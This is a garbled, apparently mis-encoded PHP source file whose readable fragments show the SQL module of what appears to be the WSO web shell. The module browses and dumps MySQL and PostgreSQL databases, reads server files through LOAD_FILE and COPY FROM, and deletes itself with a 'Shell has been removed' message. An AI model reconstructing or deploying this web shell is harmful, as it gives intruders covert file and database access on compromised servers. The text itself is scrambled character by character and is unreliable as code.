䁭祳煬彳㕬㕣瑟摢⠤摢⤩爵琳牮⁴爳㔻ഊउउॢ爵ㅫ㬍ਉउ納ਉउ爵琳牮⁦ㅬ猵㬍ਉॽഊउ昳湣琴㉮ⁱ㌵特⠤獴爩⁻ഊउॳ眴瑣栨⑴栴猭㹴祰㔩⁻ഊउउ挱猵‧浹獱氧㨍ਉउउ爵琳牮․瑨㑳ⴾ爵猠㴠䁭祳煬影㌵特⠤獴爩㬍ਉउउ扲㔱欻ഊउउ挱猵‧灧獱氧㨍ਉउउ爵琳牮․瑨㑳ⴾ爵猠㴠䁰束焳㕲礨⑴栴猭㹬㑮欬⑳瑲⤻ഊउउॢ爵ㅫ㬍ਉउ納ਉउ爵琳牮⁦ㅬ猵㬍ਉॽഊउ昳湣琴㉮⁦㕴捨⠩⁻ഊउत爵猠㴠昳湣彮㍭弱牧猨⤿昳湣彧㕴弱牧⠰⤺⑴栴猭㹲㕳㬍ਉउ獷㑴捨⠤瑨㑳ⴾ瑹瀵⤉笍ਉउॣㅳ㔠❭祳煬✺ഊउउॲ㕴㍲渠䁭祳煬彦㕴捨弱獳㉣⠤爵猩㬍ਉउउ扲㔱欻ഊउउ挱猵‧灧獱氧㨍ਉउउ爵琳牮⁀灧彦㕴捨弱獳㉣⠤爵猩㬍ਉउउ扲㔱欻ഊउॽഊउॲ㕴㍲渠昱汳㔻ഊउ納ਉ०㍮捴㐲渠水獴䑢猨⤠笍ਉउ獷㑴捨⠤瑨㑳ⴾ瑹瀵⤉笍ਉउॣㅳ㔠❭祳煬✺ഊ††††††††††††爵琳牮․瑨㑳ⴾ焳㕲礨≓䡏圠搱琱戱猵猢⤻ഊउउ扲㔱欻ഊउउ挱猵‧灧獱氧㨍ਉउउ爵琳牮․瑨㑳ⴾ爵猠㴠⑴栴猭㹱㌵特⠢卅䱅䍔⁤ㅴ渱洵⁆剏䴠灧彤ㅴㅢㅳ㔠坈䕒䔠搱琴獴㕭灬ㅴ㔡㴧琧∩㬍ਉउॢ爵ㅫ㬍ਉउ納ਉउ爵琳牮⁦ㅬ猵㬍ਉॽഊउ昳湣琴㉮⁬㑳瑔ㅢ氵猨⤠笍ਉउ獷㑴捨⠤瑨㑳ⴾ瑹瀵⤉笍ਉउॣㅳ㔠❭祳煬✺ഊउउॲ㕴㍲渠⑴栴猭㹲㕳‽․瑨㑳ⴾ焳㕲礨❓䡏圠呁䉌䕓✩㬍ਉउॢ爵ㅫ㬍ਉउॣㅳ㔠❰杳煬✺ഊउउॲ㕴㍲渠⑴栴猭㹲㕳‽․瑨㑳ⴾ焳㕲礨≳㕬㕣琠琱扬㕟渱洵⁦爲洠㑮昲牭ㅴ㐲湟獣栵洱⹴ㅢ氵猠睨㕲㔠琱扬㕟獣栵洱‡㴠✴湦㉲洱琴㉮彳捨㕭ㄧ⁁乄⁴ㅢ氵彳捨㕭ㄠℽ‧灧彣ㅴㅬ㉧✢⤻ഊउउ扲㔱欻ഊउॽഊउॲ㕴㍲渠昱汳㔻ഊउ納ਉ०㍮捴㐲渠㕲爲爨⤠笍ਉउ獷㑴捨⠤瑨㑳ⴾ瑹瀵⤉笍ਉउॣㅳ㔠❭祳煬✺ഊउउॲ㕴㍲渠䁭祳煬張牲㉲⠩㬍ਉउॢ爵ㅫ㬍ਉउॣㅳ㔠❰杳煬✺ഊउउॲ㕴㍲渠䁰束氱獴張牲㉲⠩㬍ਉउॢ爵ㅫ㬍ਉउ納ਉउ爵琳牮⁦ㅬ猵㬍ਉॽഊउ昳湣琴㉮⁳㕴䍨ㅲ猵琨⑳瑲⤠笍ਉउ獷㑴捨⠤瑨㑳ⴾ瑹瀵⤉笍ਉउॣㅳ㔠❭祳煬✺ഊउउऴ昨昳湣琴㉮張破獴猨❭祳煬彳㕴彣栱牳㕴✩⤍ਉउउॲ㕴㍲渠䁭祳煬彳㕴彣栱牳㕴⠤獴爬․瑨㑳ⴾ水湫⤻ഊउउव汳㔍ਉउउत瑨㑳ⴾ焳㕲礨❓䕔⁃䡁剓䕔‧⸤獴爩㬍ਉउउ扲㔱欻ഊउउ挱猵‧灧獱氧㨍ਉउउ爵琳牮⁀灧彳㕴彣水㕮瑟㕮挲搴湧⠤瑨㑳ⴾ水湫Ⱐ⑳瑲⤻ഊउउॢ爵ㅫ㬍ਉउ納ਉउ爵琳牮⁦ㅬ猵㬍ਉॽഊउ昳湣琴㉮⁬㈱摆㑬㔨⑳瑲⤠笍ਉउ獷㑴捨⠤瑨㑳ⴾ瑹瀵⤉笍ਉउॣㅳ㔠❭祳煬✺ഊउउॲ㕴㍲渠⑴栴猭㹦㕴捨⠤瑨㑳ⴾ焳㕲礨≓䕌䕃吠䱏䅄彆䥌䔨✢⸱摤獬ㅳ栵猨⑳瑲⤮∧⤠ㅳ⁦㑬㔢⤩㬍ਉउॢ爵ㅫ㬍ਉउॣㅳ㔠❰杳煬✺ഊउउत瑨㑳ⴾ焳㕲礨≃剅䅔䔠呁䉌䔠睳㉡⡦㑬㔠琵硴⤻䍏偙⁷猲愠䙒位‧∮ㅤ摳氱獨㕳⠤獴爩⸢✻猵氵捴⁦㑬㔠晲㉭⁷猲愻∩㬍ਉउउ⑲㴱牲ㅹ⠩㬍ਉउउ睨㑬㔨␴㴤瑨㑳ⴾ昵瑣栨⤩ഊउउउ⑲孝‽․㑛❦㑬㔧崻ഊउउत瑨㑳ⴾ焳㕲礨❤爲瀠琱扬㔠睳㉡✩㬍ਉउउ爵琳牮‱牲ㅹ⠧昴氵✽㸴浰氲搵⠢屮∬⑲⤩㬍ਉउॢ爵ㅫ㬍ਉउ納ਉउ爵琳牮⁦ㅬ猵㬍ਉॽഊउ昳湣琴㉮⁤㍭瀨⑴ㅢ氵Ⱐ⑦瀠㴠昱汳㔩⁻ഊउॳ眴瑣栨⑴栴猭㹴祰㔩ॻഊउउ挱猵‧浹獱氧㨍ਉउउ⑲㕳‽․瑨㑳ⴾ焳㕲礨❓䡏圠䍒䕁呅⁔䅂䱅⁠✮⑴ㅢ氵⸧性⤻ഊउउत捲㔱琵‽⁭祳煬彦㕴捨弱牲ㅹ⠤爵猩㬍ਉउउ⑳煬‽․捲㔱琵嬶崮∻屮∻ഊ††††††††††㑦⠤晰⤠晷爴琵⠤晰Ⱐ⑳煬⤻‵汳㔠㕣栲⠤獱氩㬍ਉउउ⑴栴猭㹱㌵特⠧卅䱅䍔‪⁆剏䴠性⸤琱扬㔮❠✩㬍ਠ†††††††††․栵ㅤ‽⁴爳㔻ഊउउॷ栴氵⠤㑴㕭‽․瑨㑳ⴾ昵瑣栨⤩⁻ഊउउउ④㉬㍭湳‽‱牲ㅹ⠩㬍ਉउउ०㉲㔱捨⠤㑴㕭‱猠⑫㴾⑶⤠笍ਠ†††††††††††††‴昨⑶‽㴠渳汬⤍ਠ†††††††††††††††․㑴㕭嬤歝‽•乕䱌∻ഊ††††††††††††††㕬猵㑦⠴獟渳洵爴挨⑶⤩ഊ††††††††††††††††␴琵浛⑫崠㴠⑶㬍ਠ†††††††††††††‵汳㔍ਠ†††††††††††††††․㑴㕭嬤歝‽•✢⹀浹獱江爵ㅬ張獣ㅰ㕟獴爴湧⠤瘩⸢✢㬍ਉउउउ④㉬㍭湳孝‽•怢⸤欮≠∻ഊउउउ納ਠ†††††††††††‴昨⑨㔱搩⁻ഊ††††††††††††††⑳煬‽‧䥎卅剔⁉乔传性⸤琱扬㔮❠ ✮㑭灬㉤㔨∬•Ⱐ④㉬㍭湳⤮∩⁖䅌啅匠屮屴⠢⸴浰氲搵⠢Ⱐ∬․㑴㕭⤮✩✻ഊ††††††††††††††⑨㔱搠㴠昱汳㔻ഊ††††††††††††素㕬猵ഊ††††††††††††††⑳煬‽•屮屴Ⱘ∮㑭灬㉤㔨∬•Ⱐ␴琵洩⸧⤧㬍ਠ†††††††††††‴昨⑦瀩⁦睲㑴㔨⑦瀬․獱氩㬠㕬猵‵捨㈨⑳煬⤻ഊउउॽഊ††††††††††㑦⠡⑨㔱搩ഊ††††††††††††㑦⠤晰⤠晷爴琵⠤晰Ⱐ∻屮屮∩㬠㕬猵‵捨㈨∻屮屮∩㬍ਉउॢ爵ㅫ㬍ਉउॣㅳ㔠❰杳煬✺ഊउउत瑨㑳ⴾ焳㕲礨❓䕌䕃吠⨠䙒位‧⸤琱扬㔩㬍ਉउउ睨㑬㔨␴琵洠㴠⑴栴猭㹦㕴捨⠩⤠笍ਉउउत挲氳浮猠㴠ㅲ爱礨⤻ഊउउउ昲爵ㅣ栨␴琵洠ㅳ․欽㸤瘩⁻ഊउउउत㑴㕭嬤歝‽•✢⸱摤獬ㅳ栵猨⑶⤮∧∻ഊउउउत挲氳浮獛崠㴠⑫㬍ਉउउॽഊ††††††††††††⑳煬‽‧䥎卅剔⁉乔传✮⑴ㅢ氵⸧ ✮㑭灬㉤㔨∬•Ⱐ④㉬㍭湳⤮✩⁖䅌啅匠⠧⸴浰氲搵⠢Ⱐ∬․㑴㕭⤮✩㬧⸢屮∻ഊ††††††††††††㑦⠤晰⤠晷爴琵⠤晰Ⱐ⑳煬⤻‵汳㔠㕣栲⠤獱氩㬍ਉउउ納ਉउॢ爵ㅫ㬍ਉउ納ਉउ爵琳牮⁦ㅬ猵㬍ਉॽഊॽ㬍ਉ⑤戠㴠渵眠䑢䍬ㅳ猨⑟偏協嬧瑹瀵❝⤻ഊऴ昨䀤彐体呛❰愧崽㴧搲睮氲ㅤ✩⁻ഊउ⑤戭㹣㉮渵捴⠤彐体呛❳煬彨㉳琧崬․彐体呛❳煬彬㉧㑮❝Ⱐ⑟偏協嬧獱江瀱獳❝Ⱐ⑟偏協嬧獱江戱猵❝⤻ഊउ⑤戭㹳㕬㕣瑤戨⑟偏協嬧獱江戱猵❝⤻ഊ††††獷㑴捨⠤彐体呛❣栱牳㕴❝⤠笍ਠ†††††⁣ㅳ㔠≗㑮搲睳ⴶ慩㘢㨠⑤戭㹳㕴䍨ㅲ猵琨❣瀶慩㘧⤻⁢爵ㅫ㬍ਠ†††††⁣ㅳ㔠≕呆ⴸ∺․摢ⴾ猵瑃栱牳㕴⠧㍴昸✩㬠扲㔱欻ഊ††††††挱猵•䭏䤸ⵒ∺․摢ⴾ猵瑃栱牳㕴⠧欲㐸爧⤻⁢爵ㅫ㬍ਠ†††††⁣ㅳ㔠≋佉㠭唢㨠⑤戭㹳㕴䍨ㅲ猵琨❫㈴㠳✩㬠扲㔱欻ഊ††††††挱猵•捰㡥攢㨠⑤戭㹳㕴䍨ㅲ猵琨❣瀸敥✩㬠扲㔱欻ഊ††††納ਠ†††‴昨㕭灴礨⑟偏協嬧昴氵❝⤩⁻ഊ††††††㉢彳琱牴⠢㉢彧穨ㅮ摬㕲∬⁵〹攩㬍ਠ†††††⁨㔱搵爨≃㉮琵湴ⵄ㑳瀲猴琴㉮㨠ㅴ琱捨洵湴㬠昴氵渱洵㵤㍭瀮獱氢⤻ഊ††††††栵ㅤ㕲⠢䌲湴㕮琭呹瀵㨠琵硴⽰氱㑮∩㬍ਠ†††††⁦㉲㔱捨⠤彐体呛❴扬❝‱猠⑶⤍ਉउत摢ⴾ搳浰⠤瘩㬍ਠ†††††‵破琻ഊ††††素㕬猵㑦⠤晰‽⁀昲瀵渨⑟偏協嬧昴氵❝Ⱐ❷✩⤠笍ਠ†††††⁦㉲㔱捨⠤彐体呛❴扬❝‱猠⑶⤍ਠ†††††††․摢ⴾ搳浰⠤瘬․晰⤻ഊ††††††晣氲猵⠤晰⤻ഊ††††††㍮猵琨⑟偏協嬧灡❝⤻ഊ††††素㕬猵ഊ††††††搴㔨✼獣爴灴㸱氵牴⠢䕲爲爡⁃ㅮ尧琠㉰㕮⁦㑬㔢⤻眴湤㉷⹨㑳琲特⹢ㅣ欨ⴶ⤼⽳捲㑰琾✩㬍ਉ納ਉ洱摨㔱搨⤻ഊव捨㈠∍਼搴瘠捬ㅳ猽栵ㅤ㕲㸍਼昲牭⁮ㅭ㔽❳昧⁭㕴栲搽❰㉳琧′湳㍢洴琽❦猨瑨㑳⤻✾㱴ㅢ氵⁣㕬汰ㅤ搴湧㴧愧⁣㕬汳瀱挴湧㴧〧㸼瑲㸍਼瑤㹔祰㔼⽴搾㱴搾䠲獴㰯瑤㸼瑤㹌㉧㑮㰯瑤㸼瑤㹐ㅳ獷㉲搼⽴搾㱴搾䐱琱戱猵㰯瑤㸼瑤㸼⽴搾㰯瑲㸼瑲㸍਼㑮瀳琠瑹瀵㵨㑤搵渠渱洵㴱⁶ㅬ㌵㵓煬㸼㑮瀳琠瑹瀵㵨㑤搵渠渱洵㵰㘠瘱氳㔽❱㌵特✾㰴湰㍴⁴祰㔽栴摤㕮⁮ㅭ㔽灡⁶ㅬ㌵㴧✾㰴湰㍴⁴祰㔽栴摤㕮⁮ㅭ㔽挠瘱氳㔽✢⸠桴浬獰㕣㐱汣栱牳⠤䝌佂䅌卛❣睤❝⤠⸢✾㰴湰㍴⁴祰㔽栴摤㕮⁮ㅭ㔽捨ㅲ猵琠瘱氳㔽✢⸠⠴獳㕴⠤彐体呛❣栱牳㕴❝⤿⑟偏協嬧捨ㅲ猵琧崺✧⤠⸢✾ഊ㱴搾㱳㕬㕣琠渱洵㴧瑹瀵✾㰲灴㐲渠瘱氳㔽❭祳煬✠∻ഊ††㑦⡀⑟偏協嬧瑹瀵❝㴽❭祳煬✩㕣栲‧猵氵捴㕤✻ഊ㕣栲•㹍祓煬㰯㉰琴㉮㸼㉰琴㉮⁶ㅬ㌵㴧灧獱氧•㬍਴昨䀤彐体呛❴祰㔧崽㴧灧獱氧⤵捨㈠❳㕬㕣琵搧㬍ਵ捨㈠∾倲獴杲㕓煬㰯㉰琴㉮㸼⽳㕬㕣琾㰯瑤㸍਼瑤㸼㑮瀳琠瑹瀵㵴㕸琠渱洵㵳煬彨㉳琠瘱氳㔽✢⸠⠵浰瑹⠤彐体呛❳煬彨㉳琧崩㼧氲挱汨㉳琧㩨瑭汳瀵挴ㅬ捨ㅲ猨⑟偏協嬧獱江栲獴❝⤩‮∧㸼⽴搾ഊ㱴搾㰴湰㍴⁴祰㔽琵硴⁮ㅭ㔽獱江氲朴渠瘱氳㔽✢⸠⠵浰瑹⠤彐体呛❳煬彬㉧㑮❝⤿❲㈲琧㩨瑭汳瀵挴ㅬ捨ㅲ猨⑟偏協嬧獱江氲朴渧崩⤠⸢✾㰯瑤㸍਼瑤㸼㑮瀳琠瑹瀵㵴㕸琠渱洵㵳煬彰ㅳ猠瘱氳㔽✢⸠⠵浰瑹⠤彐体呛❳煬彰ㅳ猧崩㼧✺桴浬獰㕣㐱汣栱牳⠤彐体呛❳煬彰ㅳ猧崩⤠⸢✾㰯瑤㸼瑤㸢㬍ਉ⑴浰‽•㰴湰㍴⁴祰㔽琵硴⁮ㅭ㔽獱江戱猵⁶ㅬ㌵㴧✾∻ഊऴ昨㑳猵琨⑟偏協嬧獱江栲獴❝⤩笍ਉऴ昨⑤戭㹣㉮渵捴⠤彐体呛❳煬彨㉳琧崬․彐体呛❳煬彬㉧㑮❝Ⱐ⑟偏協嬧獱江瀱獳❝Ⱐ⑟偏協嬧獱江戱猵❝⤩⁻ഊउॳ眴瑣栨⑟偏協嬧捨ㅲ猵琧崩⁻ഊउउ挱猵•圴湤㉷猭㙡椶∺․摢ⴾ猵瑃栱牳㕴⠧捰㙡椶✩㬠扲㔱欻ഊउउ挱猵•啔䘭㠢㨠⑤戭㹳㕴䍨ㅲ猵琨✳瑦㠧⤻⁢爵ㅫ㬍ਉउॣㅳ㔠≋佉㠭刢㨠⑤戭㹳㕴䍨ㅲ猵琨❫㈴㡲✩㬠扲㔱欻ഊउउ挱猵•䭏䤸ⵕ∺․摢ⴾ猵瑃栱牳㕴⠧欲㐸㌧⤻⁢爵ㅫ㬍ਉउॣㅳ㔠≣瀸敥∺․摢ⴾ猵瑃栱牳㕴⠧捰㡥攧⤻⁢爵ㅫ㬍ਉउ納ਉउ⑤戭㹬㑳瑄扳⠩㬍ਉउ㕣栲•㱳㕬㕣琠渱洵㵳煬形ㅳ㔾㰲灴㐲渠瘱氳㔽✧㸼⼲灴㐲渾∻ഊउॷ栴氵⠤㑴㕭‽․摢ⴾ昵瑣栨⤩⁻ഊउउ水獴⠤欵礬․瘱氳㔩‽‵ㅣ栨␴琵洩㬍ਉउव捨㈠✼㉰琴㉮⁶ㅬ㌵㴢✮⑶ㅬ㌵⸧∠✮⠤瘱氳㔽㴤彐体呛❳煬形ㅳ㔧崿❳㕬㕣琵搧㨧✩⸧㸧⸤瘱氳㔮✼⼲灴㐲渾✻ഊउॽഊउव捨㈠✼⽳㕬㕣琾✻ഊउ納ਉव汳㔠㕣栲․瑭瀻ഊॽ㕬猵ഊउ㕣栲․瑭瀻ഊव捨㈠∼⽴搾ഊउउ㱴搾㰴湰㍴⁴祰㔽猳扭㑴⁶ㅬ㌵㴧㸾✠㉮捬㑣欽❦猨搮獦⤻✾㰯瑤㸍ਠ†††††††‼瑤㸼㑮瀳琠瑹瀵㵣栵捫戲砠渱洵㵳煬彣㈳湴⁶ㅬ㌵㴧㉮✢‮ 㕭灴礨⑟偏協嬧獱江挲㍮琧崩㼧✺✠捨㕣欵搧⤠⸠∾⁣㈳湴⁴栵⁮㍭戵爠㉦⁲㉷猼⽴搾ഊउ़⽴爾ഊउ㰯琱扬㔾ഊउ㱳捲㑰琾ഊ††††††獟摢㴧∮䀱摤獬ㅳ栵猨⑟偏協嬧獱江戱猵❝⤮∧㬍ਠ†††††⁦㍮捴㐲渠晳⡦⤠笍ਠ†††††††‴昨昮獱江戱猵⹶ㅬ㌵ℽ獟摢⤠笠昮㉮猳扭㑴‽⁦㍮捴㐲渨⤠筽㬍ਠ†††††††††‴昨昮瀶⤠昮瀶⹶ㅬ㌵㴧✻ഊ††††††††††㑦⡦⹰愩⁦⹰愮瘱氳㔽✧㬍ਠ†††††††††‴昨昮灯⤠昮灯⹶ㅬ㌵㴧✻ഊ††††††††納ਠ†††††⁽ഊउ०㍮捴㐲渠獴⡴ⱬ⤠笍ਉउ।⹳昮瀶⹶ㅬ㌵‽‧猵氵捴✻ഊउउ搮獦⹰愮瘱氳㔠㴠琻ഊ††††††††㑦⡬…☠搮獦⹰漩⁤⹳昮灯⹶ㅬ㌵‽⁬㬍ਉउ।⹳昮猳扭㑴⠩㬍ਉउ納ਉउ昳湣琴㉮‴猨⤠笍ਉउ०㉲⠴㴰㬴㱤⹳昮㕬㕭㕮瑳嬧瑢汛崧崮氵湧瑨㬫⬴⤍ਉउउ搮獦⸵氵洵湴獛❴扬孝❝嬴崮捨㕣欵搠㴠Ⅴ⹳昮㕬㕭㕮瑳嬧瑢汛崧嵛㑝⹣栵捫㕤㬍ਉउ納ਉ़⽳捲㑰琾∻ഊऴ昨㑳猵琨⑤戩…☠⑤戭㹬㑮欩笍ਉव捨㈠∼扲⼾㱴ㅢ氵⁷㑤瑨㴶〰┠挵汬瀱摤㑮朽愠挵汬獰ㅣ㑮朽〾∻ഊउऴ昨ℵ浰瑹⠤彐体呛❳煬形ㅳ㔧崩⥻ഊउउ⑤戭㹳㕬㕣瑤戨⑟偏協嬧獱江戱猵❝⤻ഊउउ㕣栲•㱴爾㱴搠眴摴栽㘠獴祬㔽❢㉲搵爭琲瀺慰砠猲水搠⍥敥㬧㸼獰ㅮ㹔ㅢ氵猺㰯獰ㅮ㸼扲㸼扲㸢㬍ਉउत瑢汳彲㕳‽․摢ⴾ水獴吱扬㕳⠩㬍ਉउॷ栴氵⠤㑴㕭‽․摢ⴾ昵瑣栨⑴扬獟爵猩⤠笍ਉउउ水獴⠤欵礬․瘱氳㔩‽‵ㅣ栨␴琵洩㬍ਠ†††††††††‴昨ℵ浰瑹⠤彐体呛❳煬彣㈳湴❝⤩ഊ††††††††††††⑮‽․摢ⴾ昵瑣栨⑤戭㹱㌵特⠧卅䱅䍔⁃何乔⠪⤠ㅳ⁮⁆剏䴠✮⑶ㅬ㌵⸧✩⤻ഊउउत瘱氳㔠㴠桴浬獰㕣㐱汣栱牳⠤瘱氳㔩㬍ਉउउ㕣栲•㱮㉢爾㰴湰㍴⁴祰㔽❣栵捫戲砧⁮ㅭ㔽❴扬孝✠瘱氳㔽✢⸤瘱氳㔮∧㸦湢獰㬼ㄠ桲㕦㴣′湣水捫㵜≳琨✢⸤瘱氳㔮∧ⰶ⥜∾∮⑶ㅬ㌵⸢㰯ㄾ∠⸠⠵浰瑹⠤彐体呛❳煬彣㈳湴❝⤿✦湢獰㬧㨢‼獭ㅬ氾⡻⑮嬧渧嵽⤼⽳洱汬㸢⤠⸠∼⽮㉢爾㱢爾∻ഊउउ納ਉउव捨㈠∼㑮瀳琠瑹瀵㴧捨㕣止㉸✠㉮捬㑣欽✴猨⤻✾‼㑮瀳琠瑹瀵㵢㍴琲渠瘱氳㔽❄㍭瀧′湣水捫㴧搲挳洵湴⹳昮灡⹶ㅬ㌵㵜≤㉷湬㈱摜∻搲挳洵湴⹳昮猳扭㑴⠩㬧㸼扲㹆㑬㔠瀱瑨㨼㑮瀳琠瑹瀵㵴㕸琠渱洵㵦㑬㔠瘱氳㔽❤㍭瀮獱氧㸼⽴搾㱴搠獴祬㔽❢㉲搵爭琲瀺慰砠猲水搠⍥敥㬧㸢㬍ਉउऴ昨䀤彐体呛❰㘧崠㴽‧猵氵捴✩⁻ഊउउत彐体呛❰㘧崠㴠❱㌵特✻ഊ††††††††††⑟偏協嬧灯❝‽․彐体呛❰漧崿⑟偏協嬧灯❝㨶㬍ਉउउ⑤戭㹱㌵特⠧卅䱅䍔⁃何乔⠪⤠ㅳ⁮⁆剏䴠✠⸠⑟偏協嬧灡❝⤻ഊउउत渳洠㴠⑤戭㹦㕴捨⠩㬍ਉउउ⑰ㅧ㕳‽⁣㔴氨⑮㍭嬧渧崠⼠漰⤻ഊ††††††††††㕣栲•㱳捲㑰琾搮獦⸲湳㍢洴琽昳湣琴㉮⠩筳琨尢∠⸠⑟偏協嬧灡❝‮•尢Ⱐ搮獦⹰漮瘱氳㔩紼⽳捲㑰琾㱳瀱渾∮⑟偏協嬧灡❝⸢㰯獰ㅮ㸠⡻⑮㍭嬧渧嵽⁲㕣㉲摳⤠倱朵‣‼㑮瀳琠瑹瀵㵴㕸琠渱洵㴧灯✠瘱氳㔽∠⸠⠨㑮琩⑟偏協嬧灯❝⤠⸠∾∻ഊ††††††††††㕣栲•′映⑰ㅧ㕳∻ഊ††††††††††㑦⠤彐体呛❰漧崠㸠㘩ഊ††††††††††††㕣栲•‼ㄠ桲㕦㴣′湣水捫㴧獴⡜∢‮․彐体呛❰愧崠⸠✢Ⱐ✠⸠⠤彐体呛❰漧崭㘩‮•⤧㸦汴㬠偲㕶㰯ㄾ∻ഊ††††††††††㑦⠤彐体呛❰漧崠㰠⑰ㅧ㕳⤍ਠ†††††††††††‵捨㈠∠㰱⁨爵昽⌠㉮捬㑣欽❳琨尢∠⸠⑟偏協嬧灡❝‮‧∬‧‮ ⑟偏協嬧灯❝⬶⤠⸠∩✾丵硴…杴㬼⼱㸢㬍ਠ†††††††††․彐体呛❰漧崭ⴻഊउउऴ昨⑟偏協嬧瑹瀵❝㴽❰杳煬✩ഊउउउ⑟偏協嬧灡❝‽‧卅䱅䍔‪⁆剏䴠✮⑟偏協嬧灡❝⸧⁌䥍䥔⁯〠但䙓䕔‧⸨⑟偏協嬧灯❝⩯〩㬍ਉउउ㕬猵ഊउउउ⑟偏協嬧灡❝‽‧卅䱅䍔‪⁆剏䴠性⸤彐体呛❰愧崮❠⁌䥍䥔‧⸨⑟偏協嬧灯❝⩯〩⸧Ɐ〧㬍ਉउउ㕣栲•㱢爾㱢爾∻ഊउउ納ਉउऴ昨⡀⑟偏協嬧瀶❝‽㴠❱㌵特✩…☠ℵ浰瑹⠤彐体呛❰愧崩⤠笍ਉउउ⑤戭㹱㌵特⡀⑟偏協嬧灡❝⤻ഊउउऴ昨⑤戭㹲㕳‡㴽⁦ㅬ猵⤠笍ਉउउत琴瑬㔠㴠昱汳㔻ഊउउउ㕣栲‧㱴ㅢ氵⁷㑤瑨㴶〰┠挵汬獰ㅣ㑮朽㘠挵汬瀱摤㑮朽愠捬ㅳ猽洱㑮⁳瑹氵㴢戱捫杲㈳湤ⵣ㉬㉲㨣愹愹愹∾✻ഊउउउ⑬㑮㔠㴠㘻ഊउउउ睨㑬㔨␴琵洠㴠⑤戭㹦㕴捨⠩⤉笍ਉउउउ㑦⠡⑴㑴氵⤉笍ਉउउउव捨㈠✼瑲㸧㬍ਉउउउ०㉲㔱捨⠤㑴㕭‱猠⑫㕹‽㸠⑶ㅬ㌵⤍ਉउउउउ㕣栲‧㱴栾✮⑫㕹⸧㰯瑨㸧㬍ਉउउउॲ㕳㕴⠤㑴㕭⤻ഊउउउउ⑴㑴氵㵴爳㔻ഊउउउउ㕣栲‧㰯瑲㸼瑲㸧㬍ਉउउउत水渵‽⁡㬍ਉउउउ納ਉउउउ㕣栲‧㱴爠捬ㅳ猽≬✮⑬㑮㔮✢㸧㬍ਉउउउ⑬㑮㔠㴠⑬㑮㔽㴶㽡㨶㬍ਉउउउ昲爵ㅣ栨␴琵洠ㅳ․欵礠㴾․瘱氳㔩⁻ഊउउउउ㑦⠤瘱氳㔠㴽⁮㍬氩ഊउउउउव捨㈠✼瑤㸼㐾渳汬㰯㐾㰯瑤㸧㬍ਉउउउव汳㔍ਉउउउउ㕣栲‧㱴搾✮湬慢爨桴浬獰㕣㐱汣栱牳⠤瘱氳㔩⤮✼⽴搾✻ഊउउउॽഊउउउव捨㈠✼⽴爾✻ഊउउउ納ਉउउव捨㈠✼⽴ㅢ氵㸧㬍ਉउउ素㕬猵⁻ഊउउउ㕣栲‧㱤㑶㸼戾䕲爲爺㰯戾‧⹨瑭汳瀵挴ㅬ捨ㅲ猨⑤戭㸵牲㉲⠩⤮✼⽤㑶㸧㬍ਉउउ納ਉउॽഊउउ㕣栲•㱢爾㰯昲牭㸼昲牭′湳㍢洴琽❤⹳昮瀶⹶ㅬ㌵㵜≱㌵特尢㭤⹳昮灡⹶ㅬ㌵㵴栴献焳㕲礮瘱氳㔻搲挳洵湴⹳昮猳扭㑴⠩㭲㕴㍲渠昱汳㔻✾㱴㕸琱爵ㄠ渱洵㴧焳㕲礧⁳瑹氵㴧眴摴栺㘰〥㭨㔴杨琺㘰ば砧㸢㬍ਠ†††††††‴昨ℵ浰瑹⠤彐体呛❰愧崩…☠⠤彐体呛❰㘧崠ℽ‧氲ㅤ昴氵✩⤍ਠ†††††††††‵捨㈠桴浬獰㕣㐱汣栱牳⠤彐体呛❰愧崩㬍ਠ†††††††‵捨㈠∼⽴㕸琱爵ㄾ㱢爯㸼㑮瀳琠瑹瀵㵳㍢洴琠瘱氳㔽❅砵挳琵✾∻ഊउउ㕣栲•㰯瑤㸼⽴爾∻ഊउॽഊउव捨㈠∼⽴ㅢ氵㸼⽦㉲派㱢爯㸢㬍ਠ†††††‴昨⑟偏協嬧瑹瀵❝㴽❭祳煬✩⁻ഊ††††††††⑤戭㹱㌵特⠢卅䱅䍔‶⁆剏䴠浹獱氮㍳㕲⁗䡅剅⁣㉮挱琨怳猵牠Ⱐ❀✬⁠栲獴怩‽⁕卅刨⤠䅎䐠恆㑬㕟灲㑶怠㴠❹✢⤻ഊ††††††††㑦⠤摢ⴾ昵瑣栨⤩ഊ††††††††††㕣栲•㱦㉲洠㉮猳扭㑴㴧搮獦⹰㘮瘱氳㔽尢氲ㅤ昴氵尢㭤㉣㍭㕮琮獦⹰愮瘱氳㔽瑨㑳⹦⹶ㅬ㌵㭤㉣㍭㕮琮獦⹳㍢洴琨⤻爵琳牮⁦ㅬ猵㬧㸼獰ㅮ㹌㈱搠昴氵㰯獰ㅮ㸠㰴湰㍴†捬ㅳ猽❴㈲汳䥮瀧⁴祰㔽琵硴⁮ㅭ㔽显㰴湰㍴⁴祰㔽猳扭㑴⁶ㅬ㌵㴧㸾✾㰯昲牭㸢㬍ਠ†††††⁽ഊउऴ昨䀤彐体呛❰㘧崠㴽‧氲ㅤ昴氵✩⁻ഊउउ⑦㑬㔠㴠⑤戭㹬㈱摆㑬㔨⑟偏協嬧灡❝⤻ഊउउ㕣栲‧㱰爵⁣氱獳㵭氶㸧⹨瑭汳瀵挴ㅬ捨ㅲ猨⑦㑬㕛❦㑬㔧崩⸧㰯灲㔾✻ഊउॽഊॽ‵汳㔠笍ਠ†††‵捨㈠桴浬獰㕣㐱汣栱牳⠤摢ⴾ㕲爲爨⤩㬍ਠ†⁽ഊव捨㈠✼⽤㑶㸧㬍ਠ†⁭ㅤ昲㉴㕲⠩㬍ਠ†‍ਠ納ਠഊ⁦㍮捴㐲渠洱摳㕬晲洨⤍ਠ笍ਠ†‍ਠ†‴昨⑟偏協嬧瀶❝‽㴠❹㕳✩ഊउ㑦⡀㍮水湫⡰爵束爵灬ㅣ㔨✡尨層⭜⥜献⨡✬‧✬ 彆䥌䕟弩⤩ഊउ।㐵⠧卨㕬氠栱猠戵㕮⁲㕭㉶㕤✩㬍ਉव汳㔍ਉउ㕣栲‧㍮水湫‵牲㉲℧㬍ਠ†‴昨⑟偏協嬧瀶❝‡㴠❹㕳✩ഊ††††洱摨㔱搨⤻ഊव捨㈠∼搴瘠捬ㅳ猽栵ㅤ㕲㸼灲㔠捬ㅳ猽浬㘠獴祬㔽❭ㅲ朴渭琲瀺楰砧㸢㬍ਠ†‍ਠ†‍ਠ†‵捨㈠∍ਠ†‍ਠ††††††† 幜ഊ††† ⸭怺† 